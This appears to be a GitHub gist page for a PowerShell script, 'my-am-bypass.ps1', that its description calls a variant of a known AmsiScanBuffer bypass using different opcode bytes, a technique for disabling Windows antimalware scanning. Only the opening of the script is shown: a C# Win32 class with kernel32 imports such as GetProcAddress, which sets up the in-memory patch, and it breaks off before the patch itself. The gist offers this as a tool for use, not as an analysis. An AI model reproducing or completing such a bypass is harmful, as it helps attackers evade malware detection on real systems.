Skip to content

Instantly share code, notes, and snippets.

@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active March 19, 2024 23:38
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]